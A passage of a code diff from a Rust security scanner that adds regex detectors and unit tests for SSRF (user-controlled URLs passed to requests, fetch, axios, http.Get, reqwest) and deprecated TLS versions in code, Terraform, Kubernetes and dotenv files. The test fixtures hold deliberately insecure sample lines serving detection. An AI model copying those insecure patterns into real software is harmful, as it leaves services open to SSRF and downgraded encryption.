let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("content_security_policy"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hsts_disabled() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
Strict-Transport-Security: none
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("hsts"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_hsts_zero() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
let content = r#"
|
||||
HSTS_SECONDS = 0
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "settings.py");
|
||||
|
||||
// Should detect hsts_disabled pattern (HSTS = 0)
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_enabled() {
|
||||
let extractor = SecurityHeadersExtractor::new();
|
||||
// Safe: headers enabled
|
||||
let content = r#"
|
||||
X-Frame-Options: SAMEORIGIN
|
||||
X-Content-Type-Options: nosniff
|
||||
SECURE_BROWSER_XSS_FILTER = True
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
}
|
||||
393
applications/aphoria/src/extractors/ssrf.rs
Normal file
393
applications/aphoria/src/extractors/ssrf.rs
Normal file
@ -0,0 +1,393 @@
|
||||
//! Server-Side Request Forgery (SSRF) vulnerability extractor.
|
||||
//!
|
||||
//! Detects patterns where HTTP requests are made with user-controlled URLs,
|
||||
//! which can allow attackers to access internal services or exfiltrate data.
|
||||
|
||||
use regex::Regex;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
use super::traits::{build_claim, Extractor};
|
||||
use crate::types::{ExtractedClaim, Language};
|
||||
|
||||
/// Extractor for SSRF vulnerabilities.
|
||||
///
|
||||
/// Detects patterns indicating unsafe URL handling in HTTP requests:
|
||||
/// - HTTP clients (requests, fetch, axios, reqwest) with user-controlled URLs
|
||||
/// - Webhook/callback URLs from user input
|
||||
/// - Image/proxy URLs from request parameters
|
||||
pub struct SsrfExtractor {
|
||||
// Python patterns
|
||||
python_requests: Regex,
|
||||
python_urllib: Regex,
|
||||
python_httpx: Regex,
|
||||
|
||||
// JavaScript/TypeScript patterns
|
||||
js_fetch: Regex,
|
||||
js_axios: Regex,
|
||||
js_got: Regex,
|
||||
|
||||
// Go patterns
|
||||
go_http: Regex,
|
||||
|
||||
// Rust patterns
|
||||
rust_reqwest: Regex,
|
||||
|
||||
// Common sink patterns (all languages)
|
||||
ssrf_sink: Regex,
|
||||
}
|
||||
|
||||
impl Default for SsrfExtractor {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl SsrfExtractor {
|
||||
/// Create a new SSRF extractor with compiled regexes.
|
||||
///
|
||||
/// # Panics
|
||||
/// Panics if any regex pattern is invalid (programmer error).
|
||||
#[allow(clippy::expect_used)]
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
// Python: requests with user URL
|
||||
python_requests: Regex::new(
|
||||
r#"requests\.(?:get|post|put|delete|head|patch|request)\s*\(\s*(?:url|uri|target|endpoint|request\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
python_urllib: Regex::new(
|
||||
r#"urllib\.request\.(?:urlopen|Request)\s*\(\s*(?:url|uri|request\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
python_httpx: Regex::new(
|
||||
r#"httpx\.(?:get|post|put|delete|AsyncClient)\s*\([^)]*(?:url|uri|request\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// JavaScript: fetch with user URL
|
||||
js_fetch: Regex::new(
|
||||
r#"fetch\s*\(\s*(?:url|uri|target|endpoint|req\.(?:query|params|body)\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
js_axios: Regex::new(
|
||||
r#"axios\.(?:get|post|put|delete|request)\s*\(\s*(?:url|uri|target|endpoint)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
js_got: Regex::new(
|
||||
r#"got\s*\(\s*(?:url|uri|target|endpoint)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Go: http.Get with user URL
|
||||
go_http: Regex::new(
|
||||
r#"http\.(?:Get|Post|Head|PostForm|NewRequest)\s*\(\s*(?:url|uri|target|endpoint|r\.)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Rust: reqwest with user URL
|
||||
rust_reqwest: Regex::new(
|
||||
r#"reqwest::(?:get|Client).*\(\s*(?:url|&url|format!|user)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Common sink patterns - URLs that look user-controlled
|
||||
ssrf_sink: Regex::new(
|
||||
r#"(?i)(?:proxy_url|image_url|webhook_url|callback_url|redirect_url|target_url|remote_url|external_url)\s*[:=]\s*(?:request\.|params\.|req\.Query)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
fn make_claim(
|
||||
path_segments: &[String],
|
||||
file: &str,
|
||||
line: usize,
|
||||
matched: &str,
|
||||
category: &str,
|
||||
description: &str,
|
||||
) -> ExtractedClaim {
|
||||
build_claim(
|
||||
path_segments,
|
||||
&["network", "ssrf", category],
|
||||
"request_url_source",
|
||||
ObjectValue::Text("user_controlled".to_string()),
|
||||
file,
|
||||
line,
|
||||
matched,
|
||||
0.85,
|
||||
description,
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
impl Extractor for SsrfExtractor {
|
||||
fn name(&self) -> &str {
|
||||
"ssrf"
|
||||
}
|
||||
|
||||
fn languages(&self) -> &[Language] {
|
||||
&[
|
||||
Language::Python,
|
||||
Language::JavaScript,
|
||||
Language::TypeScript,
|
||||
Language::Go,
|
||||
Language::Rust,
|
||||
]
|
||||
}
|
||||
|
||||
fn extract(
|
||||
&self,
|
||||
path_segments: &[String],
|
||||
content: &str,
|
||||
language: Language,
|
||||
file: &str,
|
||||
) -> Vec<ExtractedClaim> {
|
||||
let mut claims = Vec::new();
|
||||
|
||||
for (line_idx, line) in content.lines().enumerate() {
|
||||
let line_num = line_idx + 1;
|
||||
|
||||
// Check for common sink patterns (all languages)
|
||||
if let Some(m) = self.ssrf_sink.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"url_sink",
|
||||
"URL variable populated from user input (SSRF risk)",
|
||||
));
|
||||
}
|
||||
|
||||
// Language-specific patterns
|
||||
match language {
|
||||
Language::Python => {
|
||||
if let Some(m) = self.python_requests.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"requests library with user-controlled URL (SSRF risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.python_urllib.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"urllib with user-controlled URL (SSRF risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.python_httpx.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"httpx with user-controlled URL (SSRF risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::JavaScript | Language::TypeScript => {
|
||||
if let Some(m) = self.js_fetch.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"fetch with user-controlled URL (SSRF risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.js_axios.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"axios with user-controlled URL (SSRF risk)",
|
||||
));
|
||||
}
|
||||
if let Some(m) = self.js_got.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"got with user-controlled URL (SSRF risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Go => {
|
||||
if let Some(m) = self.go_http.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"http.Get/Post with user-controlled URL (SSRF risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Rust => {
|
||||
if let Some(m) = self.rust_reqwest.find(line) {
|
||||
claims.push(Self::make_claim(
|
||||
path_segments,
|
||||
file,
|
||||
line_num,
|
||||
m.as_str(),
|
||||
"http_client",
|
||||
"reqwest with user-controlled URL (SSRF risk)",
|
||||
));
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_python_requests() {
|
||||
let extractor = SsrfExtractor::new();
|
||||
let content = r#"
|
||||
response = requests.get(url)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "api.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("network/ssrf"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_requests_user_input() {
|
||||
let extractor = SsrfExtractor::new();
|
||||
let content = r#"
|
||||
response = requests.post(request.json['webhook_url'], data=payload)
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "webhook.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_urllib() {
|
||||
let extractor = SsrfExtractor::new();
|
||||
let content = r#"
|
||||
data = urllib.request.urlopen(url).read()
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "fetch.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_fetch() {
|
||||
let extractor = SsrfExtractor::new();
|
||||
let content = r#"
|
||||
const data = await fetch(url);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "api.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_axios() {
|
||||
let extractor = SsrfExtractor::new();
|
||||
let content = r#"
|
||||
const response = await axios.get(url);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "api.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_http() {
|
||||
let extractor = SsrfExtractor::new();
|
||||
let content = r#"
|
||||
resp, err := http.Get(url)
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "client.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_rust_reqwest() {
|
||||
let extractor = SsrfExtractor::new();
|
||||
let content = r#"
|
||||
let body = reqwest::get(url).await?.text().await?;
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "client.rs");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_ssrf_sink_pattern() {
|
||||
let extractor = SsrfExtractor::new();
|
||||
let content = r#"
|
||||
proxy_url = req.Query("proxy")
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "proxy.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].description.contains("URL variable"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_webhook_url_sink() {
|
||||
let extractor = SsrfExtractor::new();
|
||||
let content = r#"
|
||||
webhook_url = request.json.get('callback')
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "webhook.py");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_hardcoded() {
|
||||
let extractor = SsrfExtractor::new();
|
||||
// Safe: hardcoded URL
|
||||
let content = r#"
|
||||
response = requests.get("https://api.example.com/data")
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "api.py");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
}
|
||||
@ -37,6 +37,18 @@ pub struct TlsVersionExtractor {
|
||||
|
||||
// Config file patterns (YAML, TOML, JSON)
|
||||
config_min_version: Regex,
|
||||
|
||||
// Semantic patterns (variable name suggests TLS + value is deprecated)
|
||||
semantic_tls_version: Regex,
|
||||
|
||||
// Environment variable patterns
|
||||
env_tls_version: Regex,
|
||||
|
||||
// Terraform HCL patterns
|
||||
terraform_tls: Regex,
|
||||
|
||||
// Kubernetes camelCase patterns (YAML)
|
||||
k8s_tls: Regex,
|
||||
}
|
||||
|
||||
impl Default for TlsVersionExtractor {
|
||||
@ -89,6 +101,40 @@ impl TlsVersionExtractor {
|
||||
r#"(?i)(?:min_version|tls_min_version|minimum_tls_version|ssl_min_version)\s*[:=]\s*["']?(?:1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?3)?|TLS10|TLS11)["']?"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Semantic: variable name contains tls/ssl and min/version in any order
|
||||
// Covers common patterns: TLS_MIN_VERSION, MIN_TLS_VERSION, SSL_VERSION, sslVersion, tlsMinVersion
|
||||
// Pattern 1: (tls|ssl) followed by min/version (e.g., TLS_MIN_VERSION, ssl_version)
|
||||
// Pattern 2: (min|version) followed by tls/ssl (e.g., MIN_TLS, VERSION_SSL)
|
||||
// Pattern 3: camelCase (e.g., sslVersion, tlsMinVersion, minTlsVersion)
|
||||
// Value must be terminated by quote, end of word, or end of line to avoid matching "TLS1_2" as "TLS1"
|
||||
// Allow optional type annotations (e.g., Rust `: &str`) between name and value
|
||||
semantic_tls_version: Regex::new(
|
||||
r#"(?i)\b(?:(?:tls|ssl)[_A-Z]*(?:min(?:imum)?|version)|(?:min(?:imum)?|version)[_A-Z]*(?:tls|ssl)|(?:tls|ssl)[A-Z][a-z]*(?:Version|Min)|(?:min|version)[A-Z][a-z]*(?:Tls|Ssl))\w*(?:\s*:\s*[^=]+)?\s*=\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?[23])?)(?:["'\s;]|$)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Environment variables (NAME=value, with optional export)
|
||||
// Catches: TLS_MIN_VERSION=1.0, export SSL_VERSION=TLSv1
|
||||
env_tls_version: Regex::new(
|
||||
r#"(?i)^(?:export\s+)?(\w*(?:tls|ssl)\w*(?:_?(?:min|version))+\w*)\s*=\s*["']?(1\.[01]|TLSv?1(?:\.[01])?|SSL(?:v?[23])?)["']?\s*$"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Terraform HCL patterns
|
||||
// Catches: min_tls_version = "TLS1_0", ssl_minimum_protocol_version = "TLSv1"
|
||||
// The value must be a complete deprecated version - use word boundary or quote/end
|
||||
terraform_tls: Regex::new(
|
||||
r#"(?i)(?:min(?:imum)?_)?(?:tls|ssl)(?:_(?:protocol_)?)?version\s*=\s*["']?(?:TLS_?1_?[01]|TLSv1(?:\.[01])?|1\.[01]|SSL(?:v?[23])?)(?:["'\s]|$)"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
|
||||
// Kubernetes camelCase patterns (YAML)
|
||||
// Catches: minTLSVersion: VersionTLS10, tlsMinVersion: "1.0"
|
||||
k8s_tls: Regex::new(
|
||||
r#"(?i)(?:min)?(?:tls|ssl)(?:Min)?(?:Version|Protocol)\s*:\s*["']?(?:VersionTLS1[01]|VersionSSL30|TLSv?1(?:\.[01])?|1\.[01]|SSL(?:v?[23])?)["']?"#,
|
||||
)
|
||||
.expect("valid regex"),
|
||||
}
|
||||
}
|
||||
|
||||
@ -141,6 +187,8 @@ impl Extractor for TlsVersionExtractor {
|
||||
Language::Yaml,
|
||||
Language::Toml,
|
||||
Language::Json,
|
||||
Language::Terraform,
|
||||
Language::Dotenv,
|
||||
]
|
||||
}
|
||||
|
||||
@ -267,214 +315,56 @@ impl Extractor for TlsVersionExtractor {
|
||||
"deprecated",
|
||||
"Deprecated TLS version in configuration (RFC 8996)",
|
||||
));
|
||||
// Kubernetes camelCase patterns for YAML
|
||||
if language == Language::Yaml {
|
||||
claims.extend(self.check_pattern(
|
||||
content,
|
||||
&self.k8s_tls,
|
||||
path_segments,
|
||||
file,
|
||||
"deprecated",
|
||||
"Kubernetes minTLSVersion set to deprecated value (RFC 8996)",
|
||||
));
|
||||
}
|
||||
}
|
||||
Language::Terraform => {
|
||||
claims.extend(self.check_pattern(
|
||||
content,
|
||||
&self.terraform_tls,
|
||||
path_segments,
|
||||
file,
|
||||
"deprecated",
|
||||
"Terraform TLS configuration uses deprecated version (RFC 8996)",
|
||||
));
|
||||
}
|
||||
Language::Dotenv => {
|
||||
claims.extend(self.check_pattern(
|
||||
content,
|
||||
&self.env_tls_version,
|
||||
path_segments,
|
||||
file,
|
||||
"deprecated",
|
||||
"Environment variable sets deprecated TLS version (RFC 8996)",
|
||||
));
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
|
||||
// Apply semantic pattern to all languages (cross-language)
|
||||
// This catches patterns like: const TLS_MIN_VERSION = "1.0"
|
||||
claims.extend(self.check_pattern(
|
||||
content,
|
||||
&self.semantic_tls_version,
|
||||
path_segments,
|
||||
file,
|
||||
"deprecated",
|
||||
"Semantic: Variable name suggests TLS version, value is deprecated (RFC 8996)",
|
||||
));
|
||||
|
||||
claims
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn test_rust_tls10_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
// Content with TLS10 on two lines - should find 2 matches
|
||||
let content = r#"
|
||||
use rustls::version::TLS10;
|
||||
config.min_protocol_version = Some(TLS10);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
|
||||
|
||||
// Both lines match TLS10 pattern
|
||||
assert_eq!(claims.len(), 2);
|
||||
assert!(claims.iter().all(|c| c.value == ObjectValue::Text("1.0".to_string())));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_rust_tls11_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
let version = TLS1_1;
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_version_tls10_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
cfg := &tls.Config{
|
||||
MinVersion: tls.VersionTLS10,
|
||||
}
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_version_tls11_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
cfg := &tls.Config{
|
||||
MinVersion: tls.VersionTLS11,
|
||||
}
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_tls_version_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
import ssl
|
||||
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
|
||||
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["python".to_string()], content, Language::Python, "server.py");
|
||||
|
||||
// Should detect both TLSv1 and TLSv1_1
|
||||
assert_eq!(claims.len(), 2);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_min_version_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
const server = https.createServer({
|
||||
minVersion: 'TLSv1',
|
||||
key: fs.readFileSync('key.pem')
|
||||
});
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "server.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_secure_protocol_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
const options = {
|
||||
secureProtocol: 'TLSv1_method'
|
||||
};
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["js".to_string()], content, Language::JavaScript, "client.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_yaml_min_version_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
tls:
|
||||
min_version: "1.0"
|
||||
cert_file: /etc/certs/server.crt
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(
|
||||
&["config".to_string()],
|
||||
content,
|
||||
Language::Yaml,
|
||||
"config/production.yaml",
|
||||
);
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert_eq!(claims[0].value, ObjectValue::Text("deprecated".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_yaml_tls_min_version_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
server:
|
||||
tls_min_version: TLSv1.1
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_tls12() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
cfg := &tls.Config{
|
||||
MinVersion: tls.VersionTLS12,
|
||||
}
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_tls13() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
use rustls::version::TLS13;
|
||||
config.min_protocol_version = Some(TLS13);
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_no_false_positives_modern_config() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
tls:
|
||||
min_version: "1.2"
|
||||
max_version: "1.3"
|
||||
"#;
|
||||
|
||||
let claims =
|
||||
extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
assert!(claims.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_concept_path_structure() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
cfg := &tls.Config{MinVersion: tls.VersionTLS10}
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert!(claims[0].concept_path.contains("tls/min_version"));
|
||||
}
|
||||
}
|
||||
#[path = "tls_version_tests.rs"]
|
||||
mod tests;
|
||||
|
||||
362
applications/aphoria/src/extractors/tls_version_tests.rs
Normal file
362
applications/aphoria/src/extractors/tls_version_tests.rs
Normal file
@ -0,0 +1,362 @@
|
||||
//! Tests for TLS version extractor.
|
||||
|
||||
use super::tls_version::TlsVersionExtractor;
|
||||
use super::Extractor;
|
||||
use crate::types::Language;
|
||||
use stemedb_core::types::ObjectValue;
|
||||
|
||||
#[test]
|
||||
fn test_rust_tls10_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
// Content with TLS10 on two lines - should find 2 matches
|
||||
let content = r#"
|
||||
use rustls::version::TLS10;
|
||||
config.min_protocol_version = Some(TLS10);
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
|
||||
|
||||
// Both lines match TLS10 pattern
|
||||
assert_eq!(claims.len(), 2);
|
||||
assert!(claims.iter().all(|c| c.value == ObjectValue::Text("1.0".to_string())));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_rust_tls11_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
let version = TLS1_1;
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["rust".to_string()], content, Language::Rust, "src/tls.rs");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_version_tls10_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
cfg := &tls.Config{
|
||||
MinVersion: tls.VersionTLS10,
|
||||
}
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_go_version_tls11_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
cfg := &tls.Config{
|
||||
MinVersion: tls.VersionTLS11,
|
||||
}
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["go".to_string()], content, Language::Go, "server.go");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert_eq!(claims[0].value, ObjectValue::Text("1.1".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_python_tls_version_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
import ssl
|
||||
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
|
||||
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["python".to_string()], content, Language::Python, "server.py");
|
||||
|
||||
// Should detect both TLSv1 and TLSv1_1
|
||||
assert_eq!(claims.len(), 2);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_min_version_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
const server = https.createServer({
|
||||
minVersion: 'TLSv1',
|
||||
key: fs.readFileSync('key.pem')
|
||||
});
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "server.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert_eq!(claims[0].value, ObjectValue::Text("1.0".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_js_secure_protocol_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
const options = {
|
||||
secureProtocol: 'TLSv1_method'
|
||||
};
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["js".to_string()], content, Language::JavaScript, "client.js");
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_yaml_min_version_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
tls:
|
||||
min_version: "1.0"
|
||||
cert_file: /etc/certs/server.crt
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(
|
||||
&["config".to_string()],
|
||||
content,
|
||||
Language::Yaml,
|
||||
"config/production.yaml",
|
||||
);
|
||||
|
||||
assert_eq!(claims.len(), 1);
|
||||
assert_eq!(claims[0].value, ObjectValue::Text("deprecated".to_string()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_yaml_tls_min_version_detection() {
|
||||
let extractor = TlsVersionExtractor::new();
|
||||
let content = r#"
|
||||
server:
|
||||
tls_min_version: TLSv1.1
|
||||
"#;
|
||||
|
||||
let claims = extractor.extract(&["config".to_string()], content, Language::Yaml, "config.yaml");
|
||||
|
||||
// May match both config pattern and semantic pattern
|
||||
